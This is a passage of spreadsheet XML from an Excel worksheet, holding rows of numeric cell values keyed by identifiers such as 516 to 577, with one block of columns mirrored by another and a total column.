        <v>98</v>
      </c>
      <c r="K193" s="7">
        <v>515</v>
      </c>
      <c r="L193" s="8">
        <v>0</v>
      </c>
      <c r="M193" s="8">
        <v>0</v>
      </c>
      <c r="N193" s="8">
        <v>5</v>
      </c>
      <c r="O193" s="8">
        <v>92</v>
      </c>
      <c r="P193" s="8">
        <v>1</v>
      </c>
      <c r="Q193" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="194" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A194" s="7">
        <v>516</v>
      </c>
      <c r="B194" s="8">
        <v>0</v>
      </c>
      <c r="C194" s="8">
        <v>0</v>
      </c>
      <c r="D194" s="8">
        <v>4</v>
      </c>
      <c r="E194" s="8">
        <v>90</v>
      </c>
      <c r="F194" s="8">
        <v>2</v>
      </c>
      <c r="G194" s="8">
        <v>0</v>
      </c>
      <c r="H194" s="8">
        <v>96</v>
      </c>
      <c r="K194" s="7">
        <v>516</v>
      </c>
      <c r="L194" s="8">
        <v>0</v>
      </c>
      <c r="M194" s="8">
        <v>0</v>
      </c>
      <c r="N194" s="8">
        <v>4</v>
      </c>
      <c r="O194" s="8">
        <v>90</v>
      </c>
      <c r="P194" s="8">
        <v>2</v>
      </c>
      <c r="Q194" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="195" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A195" s="7">
        <v>518</v>
      </c>
      <c r="B195" s="8">
        <v>21</v>
      </c>
      <c r="C195" s="8">
        <v>1</v>
      </c>
      <c r="D195" s="8">
        <v>0</v>
      </c>
      <c r="E195" s="8">
        <v>140</v>
      </c>
      <c r="F195" s="8">
        <v>70</v>
      </c>
      <c r="G195" s="8">
        <v>38</v>
      </c>
      <c r="H195" s="8">
        <v>270</v>
      </c>
      <c r="K195" s="7">
        <v>518</v>
      </c>
      <c r="L195" s="8">
        <v>21</v>
      </c>
      <c r="M195" s="8">
        <v>1</v>
      </c>
      <c r="N195" s="8">
        <v>0</v>
      </c>
      <c r="O195" s="8">
        <v>140</v>
      </c>
      <c r="P195" s="8">
        <v>70</v>
      </c>
      <c r="Q195" s="8">
        <v>38</v>
      </c>
    </row>
    <row r="196" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A196" s="7">
        <v>519</v>
      </c>
      <c r="B196" s="8">
        <v>25</v>
      </c>
      <c r="C196" s="8">
        <v>1</v>
      </c>
      <c r="D196" s="8">
        <v>6</v>
      </c>
      <c r="E196" s="8">
        <v>7</v>
      </c>
      <c r="F196" s="8">
        <v>7</v>
      </c>
      <c r="G196" s="8">
        <v>0</v>
      </c>
      <c r="H196" s="8">
        <v>46</v>
      </c>
      <c r="K196" s="7">
        <v>519</v>
      </c>
      <c r="L196" s="8">
        <v>25</v>
      </c>
      <c r="M196" s="8">
        <v>1</v>
      </c>
      <c r="N196" s="8">
        <v>6</v>
      </c>
      <c r="O196" s="8">
        <v>7</v>
      </c>
      <c r="P196" s="8">
        <v>7</v>
      </c>
      <c r="Q196" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="197" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A197" s="7">
        <v>520</v>
      </c>
      <c r="B197" s="8">
        <v>7</v>
      </c>
      <c r="C197" s="8">
        <v>0</v>
      </c>
      <c r="D197" s="8">
        <v>12</v>
      </c>
      <c r="E197" s="8">
        <v>5</v>
      </c>
      <c r="F197" s="8">
        <v>1</v>
      </c>
      <c r="G197" s="8">
        <v>2</v>
      </c>
      <c r="H197" s="8">
        <v>27</v>
      </c>
      <c r="K197" s="7">
        <v>520</v>
      </c>
      <c r="L197" s="8">
        <v>7</v>
      </c>
      <c r="M197" s="8">
        <v>0</v>
      </c>
      <c r="N197" s="8">
        <v>12</v>
      </c>
      <c r="O197" s="8">
        <v>5</v>
      </c>
      <c r="P197" s="8">
        <v>1</v>
      </c>
      <c r="Q197" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="198" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A198" s="7">
        <v>522</v>
      </c>
      <c r="B198" s="8">
        <v>0</v>
      </c>
      <c r="C198" s="8">
        <v>0</v>
      </c>
      <c r="D198" s="8">
        <v>0</v>
      </c>
      <c r="E198" s="8">
        <v>0</v>
      </c>
      <c r="F198" s="8">
        <v>0</v>
      </c>
      <c r="G198" s="8">
        <v>0</v>
      </c>
      <c r="H198" s="8">
        <v>0</v>
      </c>
      <c r="K198" s="7">
        <v>522</v>
      </c>
      <c r="L198" s="8">
        <v>0</v>
      </c>
      <c r="M198" s="8">
        <v>0</v>
      </c>
      <c r="N198" s="8">
        <v>0</v>
      </c>
      <c r="O198" s="8">
        <v>0</v>
      </c>
      <c r="P198" s="8">
        <v>0</v>
      </c>
      <c r="Q198" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="199" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A199" s="7">
        <v>524</v>
      </c>
      <c r="B199" s="8">
        <v>26</v>
      </c>
      <c r="C199" s="8">
        <v>1</v>
      </c>
      <c r="D199" s="8">
        <v>48</v>
      </c>
      <c r="E199" s="8">
        <v>177</v>
      </c>
      <c r="F199" s="8">
        <v>0</v>
      </c>
      <c r="G199" s="8">
        <v>21</v>
      </c>
      <c r="H199" s="8">
        <v>273</v>
      </c>
      <c r="K199" s="7">
        <v>524</v>
      </c>
      <c r="L199" s="8">
        <v>26</v>
      </c>
      <c r="M199" s="8">
        <v>1</v>
      </c>
      <c r="N199" s="8">
        <v>48</v>
      </c>
      <c r="O199" s="8">
        <v>177</v>
      </c>
      <c r="P199" s="8">
        <v>0</v>
      </c>
      <c r="Q199" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="200" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A200" s="7">
        <v>527</v>
      </c>
      <c r="B200" s="8">
        <v>0</v>
      </c>
      <c r="C200" s="8">
        <v>0</v>
      </c>
      <c r="D200" s="8">
        <v>0</v>
      </c>
      <c r="E200" s="8">
        <v>0</v>
      </c>
      <c r="F200" s="8">
        <v>6</v>
      </c>
      <c r="G200" s="8">
        <v>2</v>
      </c>
      <c r="H200" s="8">
        <v>8</v>
      </c>
      <c r="K200" s="7">
        <v>527</v>
      </c>
      <c r="L200" s="8">
        <v>0</v>
      </c>
      <c r="M200" s="8">
        <v>0</v>
      </c>
      <c r="N200" s="8">
        <v>0</v>
      </c>
      <c r="O200" s="8">
        <v>0</v>
      </c>
      <c r="P200" s="8">
        <v>6</v>
      </c>
      <c r="Q200" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="201" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A201" s="7">
        <v>528</v>
      </c>
      <c r="B201" s="8">
        <v>21</v>
      </c>
      <c r="C201" s="8">
        <v>1</v>
      </c>
      <c r="D201" s="8">
        <v>1</v>
      </c>
      <c r="E201" s="8">
        <v>4</v>
      </c>
      <c r="F201" s="8">
        <v>1</v>
      </c>
      <c r="G201" s="8">
        <v>0</v>
      </c>
      <c r="H201" s="8">
        <v>28</v>
      </c>
      <c r="K201" s="7">
        <v>528</v>
      </c>
      <c r="L201" s="8">
        <v>21</v>
      </c>
      <c r="M201" s="8">
        <v>1</v>
      </c>
      <c r="N201" s="8">
        <v>1</v>
      </c>
      <c r="O201" s="8">
        <v>4</v>
      </c>
      <c r="P201" s="8">
        <v>1</v>
      </c>
      <c r="Q201" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="202" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A202" s="7">
        <v>529</v>
      </c>
      <c r="B202" s="8">
        <v>25</v>
      </c>
      <c r="C202" s="8">
        <v>1</v>
      </c>
      <c r="D202" s="8">
        <v>19</v>
      </c>
      <c r="E202" s="8">
        <v>12</v>
      </c>
      <c r="F202" s="8">
        <v>13</v>
      </c>
      <c r="G202" s="8">
        <v>4</v>
      </c>
      <c r="H202" s="8">
        <v>74</v>
      </c>
      <c r="K202" s="7">
        <v>529</v>
      </c>
      <c r="L202" s="8">
        <v>25</v>
      </c>
      <c r="M202" s="8">
        <v>1</v>
      </c>
      <c r="N202" s="8">
        <v>19</v>
      </c>
      <c r="O202" s="8">
        <v>12</v>
      </c>
      <c r="P202" s="8">
        <v>13</v>
      </c>
      <c r="Q202" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="203" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A203" s="7">
        <v>532</v>
      </c>
      <c r="B203" s="8">
        <v>26</v>
      </c>
      <c r="C203" s="8">
        <v>1</v>
      </c>
      <c r="D203" s="8">
        <v>28</v>
      </c>
      <c r="E203" s="8">
        <v>4</v>
      </c>
      <c r="F203" s="8">
        <v>11</v>
      </c>
      <c r="G203" s="8">
        <v>8</v>
      </c>
      <c r="H203" s="8">
        <v>78</v>
      </c>
      <c r="K203" s="7">
        <v>532</v>
      </c>
      <c r="L203" s="8">
        <v>26</v>
      </c>
      <c r="M203" s="8">
        <v>1</v>
      </c>
      <c r="N203" s="8">
        <v>28</v>
      </c>
      <c r="O203" s="8">
        <v>4</v>
      </c>
      <c r="P203" s="8">
        <v>11</v>
      </c>
      <c r="Q203" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="204" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A204" s="7">
        <v>533</v>
      </c>
      <c r="B204" s="8">
        <v>0</v>
      </c>
      <c r="C204" s="8">
        <v>0</v>
      </c>
      <c r="D204" s="8">
        <v>0</v>
      </c>
      <c r="E204" s="8">
        <v>0</v>
      </c>
      <c r="F204" s="8">
        <v>4</v>
      </c>
      <c r="G204" s="8">
        <v>1</v>
      </c>
      <c r="H204" s="8">
        <v>5</v>
      </c>
      <c r="K204" s="7">
        <v>533</v>
      </c>
      <c r="L204" s="8">
        <v>0</v>
      </c>
      <c r="M204" s="8">
        <v>0</v>
      </c>
      <c r="N204" s="8">
        <v>0</v>
      </c>
      <c r="O204" s="8">
        <v>0</v>
      </c>
      <c r="P204" s="8">
        <v>4</v>
      </c>
      <c r="Q204" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="205" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A205" s="7">
        <v>537</v>
      </c>
      <c r="B205" s="8">
        <v>30</v>
      </c>
      <c r="C205" s="8">
        <v>0</v>
      </c>
      <c r="D205" s="8">
        <v>38</v>
      </c>
      <c r="E205" s="8">
        <v>72</v>
      </c>
      <c r="F205" s="8">
        <v>6</v>
      </c>
      <c r="G205" s="8">
        <v>19</v>
      </c>
      <c r="H205" s="8">
        <v>165</v>
      </c>
      <c r="K205" s="7">
        <v>537</v>
      </c>
      <c r="L205" s="8">
        <v>30</v>
      </c>
      <c r="M205" s="8">
        <v>0</v>
      </c>
      <c r="N205" s="8">
        <v>38</v>
      </c>
      <c r="O205" s="8">
        <v>72</v>
      </c>
      <c r="P205" s="8">
        <v>6</v>
      </c>
      <c r="Q205" s="8">
        <v>19</v>
      </c>
    </row>
    <row r="206" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A206" s="7">
        <v>538</v>
      </c>
      <c r="B206" s="8">
        <v>6</v>
      </c>
      <c r="C206" s="8">
        <v>1</v>
      </c>
      <c r="D206" s="8">
        <v>0</v>
      </c>
      <c r="E206" s="8">
        <v>0</v>
      </c>
      <c r="F206" s="8">
        <v>5</v>
      </c>
      <c r="G206" s="8">
        <v>5</v>
      </c>
      <c r="H206" s="8">
        <v>17</v>
      </c>
      <c r="K206" s="7">
        <v>538</v>
      </c>
      <c r="L206" s="8">
        <v>6</v>
      </c>
      <c r="M206" s="8">
        <v>1</v>
      </c>
      <c r="N206" s="8">
        <v>0</v>
      </c>
      <c r="O206" s="8">
        <v>0</v>
      </c>
      <c r="P206" s="8">
        <v>5</v>
      </c>
      <c r="Q206" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="207" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A207" s="7">
        <v>540</v>
      </c>
      <c r="B207" s="8">
        <v>1</v>
      </c>
      <c r="C207" s="8">
        <v>1</v>
      </c>
      <c r="D207" s="8">
        <v>1</v>
      </c>
      <c r="E207" s="8">
        <v>38</v>
      </c>
      <c r="F207" s="8">
        <v>3</v>
      </c>
      <c r="G207" s="8">
        <v>2</v>
      </c>
      <c r="H207" s="8">
        <v>46</v>
      </c>
      <c r="K207" s="7">
        <v>540</v>
      </c>
      <c r="L207" s="8">
        <v>1</v>
      </c>
      <c r="M207" s="8">
        <v>1</v>
      </c>
      <c r="N207" s="8">
        <v>1</v>
      </c>
      <c r="O207" s="8">
        <v>38</v>
      </c>
      <c r="P207" s="8">
        <v>3</v>
      </c>
      <c r="Q207" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="208" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A208" s="7">
        <v>541</v>
      </c>
      <c r="B208" s="8">
        <v>25</v>
      </c>
      <c r="C208" s="8">
        <v>1</v>
      </c>
      <c r="D208" s="8">
        <v>4</v>
      </c>
      <c r="E208" s="8">
        <v>5</v>
      </c>
      <c r="F208" s="8">
        <v>4</v>
      </c>
      <c r="G208" s="8">
        <v>2</v>
      </c>
      <c r="H208" s="8">
        <v>41</v>
      </c>
      <c r="K208" s="7">
        <v>541</v>
      </c>
      <c r="L208" s="8">
        <v>25</v>
      </c>
      <c r="M208" s="8">
        <v>1</v>
      </c>
      <c r="N208" s="8">
        <v>4</v>
      </c>
      <c r="O208" s="8">
        <v>5</v>
      </c>
      <c r="P208" s="8">
        <v>4</v>
      </c>
      <c r="Q208" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="209" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A209" s="7">
        <v>548</v>
      </c>
      <c r="B209" s="8">
        <v>26</v>
      </c>
      <c r="C209" s="8">
        <v>1</v>
      </c>
      <c r="D209" s="8">
        <v>0</v>
      </c>
      <c r="E209" s="8">
        <v>0</v>
      </c>
      <c r="F209" s="8">
        <v>17</v>
      </c>
      <c r="G209" s="8">
        <v>7</v>
      </c>
      <c r="H209" s="8">
        <v>51</v>
      </c>
      <c r="K209" s="7">
        <v>548</v>
      </c>
      <c r="L209" s="8">
        <v>26</v>
      </c>
      <c r="M209" s="8">
        <v>1</v>
      </c>
      <c r="N209" s="8">
        <v>0</v>
      </c>
      <c r="O209" s="8">
        <v>0</v>
      </c>
      <c r="P209" s="8">
        <v>17</v>
      </c>
      <c r="Q209" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="210" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A210" s="7">
        <v>549</v>
      </c>
      <c r="B210" s="8">
        <v>25</v>
      </c>
      <c r="C210" s="8">
        <v>1</v>
      </c>
      <c r="D210" s="8">
        <v>75</v>
      </c>
      <c r="E210" s="8">
        <v>37</v>
      </c>
      <c r="F210" s="8">
        <v>49</v>
      </c>
      <c r="G210" s="8">
        <v>18</v>
      </c>
      <c r="H210" s="8">
        <v>205</v>
      </c>
      <c r="K210" s="7">
        <v>549</v>
      </c>
      <c r="L210" s="8">
        <v>25</v>
      </c>
      <c r="M210" s="8">
        <v>1</v>
      </c>
      <c r="N210" s="8">
        <v>75</v>
      </c>
      <c r="O210" s="8">
        <v>37</v>
      </c>
      <c r="P210" s="8">
        <v>49</v>
      </c>
      <c r="Q210" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="211" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A211" s="7">
        <v>550</v>
      </c>
      <c r="B211" s="8">
        <v>26</v>
      </c>
      <c r="C211" s="8">
        <v>3</v>
      </c>
      <c r="D211" s="8">
        <v>19</v>
      </c>
      <c r="E211" s="8">
        <v>30</v>
      </c>
      <c r="F211" s="8">
        <v>8</v>
      </c>
      <c r="G211" s="8">
        <v>5</v>
      </c>
      <c r="H211" s="8">
        <v>91</v>
      </c>
      <c r="K211" s="7">
        <v>550</v>
      </c>
      <c r="L211" s="8">
        <v>26</v>
      </c>
      <c r="M211" s="8">
        <v>3</v>
      </c>
      <c r="N211" s="8">
        <v>19</v>
      </c>
      <c r="O211" s="8">
        <v>30</v>
      </c>
      <c r="P211" s="8">
        <v>8</v>
      </c>
      <c r="Q211" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="212" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A212" s="7">
        <v>551</v>
      </c>
      <c r="B212" s="8">
        <v>21</v>
      </c>
      <c r="C212" s="8">
        <v>0</v>
      </c>
      <c r="D212" s="8">
        <v>7</v>
      </c>
      <c r="E212" s="8">
        <v>3</v>
      </c>
      <c r="F212" s="8">
        <v>13</v>
      </c>
      <c r="G212" s="8">
        <v>2</v>
      </c>
      <c r="H212" s="8">
        <v>46</v>
      </c>
      <c r="K212" s="7">
        <v>551</v>
      </c>
      <c r="L212" s="8">
        <v>21</v>
      </c>
      <c r="M212" s="8">
        <v>0</v>
      </c>
      <c r="N212" s="8">
        <v>7</v>
      </c>
      <c r="O212" s="8">
        <v>3</v>
      </c>
      <c r="P212" s="8">
        <v>13</v>
      </c>
      <c r="Q212" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="213" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A213" s="7">
        <v>555</v>
      </c>
      <c r="B213" s="8">
        <v>22</v>
      </c>
      <c r="C213" s="8">
        <v>1</v>
      </c>
      <c r="D213" s="8">
        <v>2</v>
      </c>
      <c r="E213" s="8">
        <v>0</v>
      </c>
      <c r="F213" s="8">
        <v>3</v>
      </c>
      <c r="G213" s="8">
        <v>0</v>
      </c>
      <c r="H213" s="8">
        <v>28</v>
      </c>
      <c r="K213" s="7">
        <v>555</v>
      </c>
      <c r="L213" s="8">
        <v>22</v>
      </c>
      <c r="M213" s="8">
        <v>1</v>
      </c>
      <c r="N213" s="8">
        <v>2</v>
      </c>
      <c r="O213" s="8">
        <v>0</v>
      </c>
      <c r="P213" s="8">
        <v>3</v>
      </c>
      <c r="Q213" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="214" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A214" s="7">
        <v>557</v>
      </c>
      <c r="B214" s="8">
        <v>1</v>
      </c>
      <c r="C214" s="8">
        <v>1</v>
      </c>
      <c r="D214" s="8">
        <v>3</v>
      </c>
      <c r="E214" s="8">
        <v>3</v>
      </c>
      <c r="F214" s="8">
        <v>22</v>
      </c>
      <c r="G214" s="8">
        <v>13</v>
      </c>
      <c r="H214" s="8">
        <v>43</v>
      </c>
      <c r="K214" s="7">
        <v>557</v>
      </c>
      <c r="L214" s="8">
        <v>1</v>
      </c>
      <c r="M214" s="8">
        <v>1</v>
      </c>
      <c r="N214" s="8">
        <v>3</v>
      </c>
      <c r="O214" s="8">
        <v>3</v>
      </c>
      <c r="P214" s="8">
        <v>22</v>
      </c>
      <c r="Q214" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="215" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A215" s="7">
        <v>558</v>
      </c>
      <c r="B215" s="8">
        <v>25</v>
      </c>
      <c r="C215" s="8">
        <v>1</v>
      </c>
      <c r="D215" s="8">
        <v>41</v>
      </c>
      <c r="E215" s="8">
        <v>134</v>
      </c>
      <c r="F215" s="8">
        <v>11</v>
      </c>
      <c r="G215" s="8">
        <v>9</v>
      </c>
      <c r="H215" s="8">
        <v>221</v>
      </c>
      <c r="K215" s="7">
        <v>558</v>
      </c>
      <c r="L215" s="8">
        <v>25</v>
      </c>
      <c r="M215" s="8">
        <v>1</v>
      </c>
      <c r="N215" s="8">
        <v>41</v>
      </c>
      <c r="O215" s="8">
        <v>134</v>
      </c>
      <c r="P215" s="8">
        <v>11</v>
      </c>
      <c r="Q215" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="216" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A216" s="7">
        <v>559</v>
      </c>
      <c r="B216" s="8">
        <v>0</v>
      </c>
      <c r="C216" s="8">
        <v>0</v>
      </c>
      <c r="D216" s="8">
        <v>4</v>
      </c>
      <c r="E216" s="8">
        <v>62</v>
      </c>
      <c r="F216" s="8">
        <v>3</v>
      </c>
      <c r="G216" s="8">
        <v>0</v>
      </c>
      <c r="H216" s="8">
        <v>69</v>
      </c>
      <c r="K216" s="7">
        <v>559</v>
      </c>
      <c r="L216" s="8">
        <v>0</v>
      </c>
      <c r="M216" s="8">
        <v>0</v>
      </c>
      <c r="N216" s="8">
        <v>4</v>
      </c>
      <c r="O216" s="8">
        <v>62</v>
      </c>
      <c r="P216" s="8">
        <v>3</v>
      </c>
      <c r="Q216" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="217" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A217" s="7">
        <v>560</v>
      </c>
      <c r="B217" s="8">
        <v>24</v>
      </c>
      <c r="C217" s="8">
        <v>1</v>
      </c>
      <c r="D217" s="8">
        <v>27</v>
      </c>
      <c r="E217" s="8">
        <v>33</v>
      </c>
      <c r="F217" s="8">
        <v>3</v>
      </c>
      <c r="G217" s="8">
        <v>1</v>
      </c>
      <c r="H217" s="8">
        <v>89</v>
      </c>
      <c r="K217" s="7">
        <v>560</v>
      </c>
      <c r="L217" s="8">
        <v>24</v>
      </c>
      <c r="M217" s="8">
        <v>1</v>
      </c>
      <c r="N217" s="8">
        <v>27</v>
      </c>
      <c r="O217" s="8">
        <v>33</v>
      </c>
      <c r="P217" s="8">
        <v>3</v>
      </c>
      <c r="Q217" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="218" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A218" s="7">
        <v>561</v>
      </c>
      <c r="B218" s="8">
        <v>51</v>
      </c>
      <c r="C218" s="8">
        <v>0</v>
      </c>
      <c r="D218" s="8">
        <v>10</v>
      </c>
      <c r="E218" s="8">
        <v>16</v>
      </c>
      <c r="F218" s="8">
        <v>10</v>
      </c>
      <c r="G218" s="8">
        <v>5</v>
      </c>
      <c r="H218" s="8">
        <v>92</v>
      </c>
      <c r="K218" s="7">
        <v>561</v>
      </c>
      <c r="L218" s="8">
        <v>51</v>
      </c>
      <c r="M218" s="8">
        <v>0</v>
      </c>
      <c r="N218" s="8">
        <v>10</v>
      </c>
      <c r="O218" s="8">
        <v>16</v>
      </c>
      <c r="P218" s="8">
        <v>10</v>
      </c>
      <c r="Q218" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="219" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A219" s="7">
        <v>563</v>
      </c>
      <c r="B219" s="8">
        <v>26</v>
      </c>
      <c r="C219" s="8">
        <v>2</v>
      </c>
      <c r="D219" s="8">
        <v>25</v>
      </c>
      <c r="E219" s="8">
        <v>25</v>
      </c>
      <c r="F219" s="8">
        <v>44</v>
      </c>
      <c r="G219" s="8">
        <v>52</v>
      </c>
      <c r="H219" s="8">
        <v>174</v>
      </c>
      <c r="K219" s="7">
        <v>563</v>
      </c>
      <c r="L219" s="8">
        <v>26</v>
      </c>
      <c r="M219" s="8">
        <v>2</v>
      </c>
      <c r="N219" s="8">
        <v>25</v>
      </c>
      <c r="O219" s="8">
        <v>25</v>
      </c>
      <c r="P219" s="8">
        <v>44</v>
      </c>
      <c r="Q219" s="8">
        <v>52</v>
      </c>
    </row>
    <row r="220" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A220" s="7">
        <v>564</v>
      </c>
      <c r="B220" s="8">
        <v>28</v>
      </c>
      <c r="C220" s="8">
        <v>1</v>
      </c>
      <c r="D220" s="8">
        <v>64</v>
      </c>
      <c r="E220" s="8">
        <v>92</v>
      </c>
      <c r="F220" s="8">
        <v>12</v>
      </c>
      <c r="G220" s="8">
        <v>6</v>
      </c>
      <c r="H220" s="8">
        <v>203</v>
      </c>
      <c r="K220" s="7">
        <v>564</v>
      </c>
      <c r="L220" s="8">
        <v>28</v>
      </c>
      <c r="M220" s="8">
        <v>1</v>
      </c>
      <c r="N220" s="8">
        <v>64</v>
      </c>
      <c r="O220" s="8">
        <v>92</v>
      </c>
      <c r="P220" s="8">
        <v>12</v>
      </c>
      <c r="Q220" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="221" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A221" s="7">
        <v>565</v>
      </c>
      <c r="B221" s="8">
        <v>26</v>
      </c>
      <c r="C221" s="8">
        <v>1</v>
      </c>
      <c r="D221" s="8">
        <v>44</v>
      </c>
      <c r="E221" s="8">
        <v>41</v>
      </c>
      <c r="F221" s="8">
        <v>5</v>
      </c>
      <c r="G221" s="8">
        <v>0</v>
      </c>
      <c r="H221" s="8">
        <v>117</v>
      </c>
      <c r="K221" s="7">
        <v>565</v>
      </c>
      <c r="L221" s="8">
        <v>26</v>
      </c>
      <c r="M221" s="8">
        <v>1</v>
      </c>
      <c r="N221" s="8">
        <v>44</v>
      </c>
      <c r="O221" s="8">
        <v>41</v>
      </c>
      <c r="P221" s="8">
        <v>5</v>
      </c>
      <c r="Q221" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="222" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A222" s="7">
        <v>567</v>
      </c>
      <c r="B222" s="8">
        <v>27</v>
      </c>
      <c r="C222" s="8">
        <v>0</v>
      </c>
      <c r="D222" s="8">
        <v>0</v>
      </c>
      <c r="E222" s="8">
        <v>0</v>
      </c>
      <c r="F222" s="8">
        <v>2</v>
      </c>
      <c r="G222" s="8">
        <v>0</v>
      </c>
      <c r="H222" s="8">
        <v>29</v>
      </c>
      <c r="K222" s="7">
        <v>567</v>
      </c>
      <c r="L222" s="8">
        <v>27</v>
      </c>
      <c r="M222" s="8">
        <v>0</v>
      </c>
      <c r="N222" s="8">
        <v>0</v>
      </c>
      <c r="O222" s="8">
        <v>0</v>
      </c>
      <c r="P222" s="8">
        <v>2</v>
      </c>
      <c r="Q222" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="223" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A223" s="7">
        <v>569</v>
      </c>
      <c r="B223" s="8">
        <v>24</v>
      </c>
      <c r="C223" s="8">
        <v>0</v>
      </c>
      <c r="D223" s="8">
        <v>0</v>
      </c>
      <c r="E223" s="8">
        <v>8</v>
      </c>
      <c r="F223" s="8">
        <v>5</v>
      </c>
      <c r="G223" s="8">
        <v>5</v>
      </c>
      <c r="H223" s="8">
        <v>42</v>
      </c>
      <c r="K223" s="7">
        <v>569</v>
      </c>
      <c r="L223" s="8">
        <v>24</v>
      </c>
      <c r="M223" s="8">
        <v>0</v>
      </c>
      <c r="N223" s="8">
        <v>0</v>
      </c>
      <c r="O223" s="8">
        <v>8</v>
      </c>
      <c r="P223" s="8">
        <v>5</v>
      </c>
      <c r="Q223" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="224" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A224" s="7">
        <v>571</v>
      </c>
      <c r="B224" s="8">
        <v>25</v>
      </c>
      <c r="C224" s="8">
        <v>0</v>
      </c>
      <c r="D224" s="8">
        <v>0</v>
      </c>
      <c r="E224" s="8">
        <v>0</v>
      </c>
      <c r="F224" s="8">
        <v>6</v>
      </c>
      <c r="G224" s="8">
        <v>14</v>
      </c>
      <c r="H224" s="8">
        <v>45</v>
      </c>
      <c r="K224" s="7">
        <v>571</v>
      </c>
      <c r="L224" s="8">
        <v>25</v>
      </c>
      <c r="M224" s="8">
        <v>0</v>
      </c>
      <c r="N224" s="8">
        <v>0</v>
      </c>
      <c r="O224" s="8">
        <v>0</v>
      </c>
      <c r="P224" s="8">
        <v>6</v>
      </c>
      <c r="Q224" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="225" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A225" s="7">
        <v>572</v>
      </c>
      <c r="B225" s="8">
        <v>27</v>
      </c>
      <c r="C225" s="8">
        <v>0</v>
      </c>
      <c r="D225" s="8">
        <v>5</v>
      </c>
      <c r="E225" s="8">
        <v>0</v>
      </c>
      <c r="F225" s="8">
        <v>4</v>
      </c>
      <c r="G225" s="8">
        <v>0</v>
      </c>
      <c r="H225" s="8">
        <v>36</v>
      </c>
      <c r="K225" s="7">
        <v>572</v>
      </c>
      <c r="L225" s="8">
        <v>27</v>
      </c>
      <c r="M225" s="8">
        <v>0</v>
      </c>
      <c r="N225" s="8">
        <v>5</v>
      </c>
      <c r="O225" s="8">
        <v>0</v>
      </c>
      <c r="P225" s="8">
        <v>4</v>
      </c>
      <c r="Q225" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="226" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A226" s="7">
        <v>575</v>
      </c>
      <c r="B226" s="8">
        <v>20</v>
      </c>
      <c r="C226" s="8">
        <v>1</v>
      </c>
      <c r="D226" s="8">
        <v>102</v>
      </c>
      <c r="E226" s="8">
        <v>50</v>
      </c>
      <c r="F226" s="8">
        <v>65</v>
      </c>
      <c r="G226" s="8">
        <v>151</v>
      </c>
      <c r="H226" s="8">
        <v>389</v>
      </c>
      <c r="K226" s="7">
        <v>575</v>
      </c>
      <c r="L226" s="8">
        <v>20</v>
      </c>
      <c r="M226" s="8">
        <v>1</v>
      </c>
      <c r="N226" s="8">
        <v>102</v>
      </c>
      <c r="O226" s="8">
        <v>50</v>
      </c>
      <c r="P226" s="8">
        <v>65</v>
      </c>
      <c r="Q226" s="8">
        <v>151</v>
      </c>
    </row>
    <row r="227" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A227" s="7">
        <v>577</v>
      </c>
      <c r="B227" s="8">
        <v>15</v>
      </c>
      <c r="C227" s="8">
        <v>0</v>
      </c>
      <c r="D227" s="8">
        <v>3</v>
      </c>
      <c r="E227" s="8">
        <v>5</v>
      </c>
      <c r="F227" s="8">
        <v>1</v>
      </c>
      <c r="G227" s="8">
        <v>2</v>
      </c>
      <c r="H227" s="8">
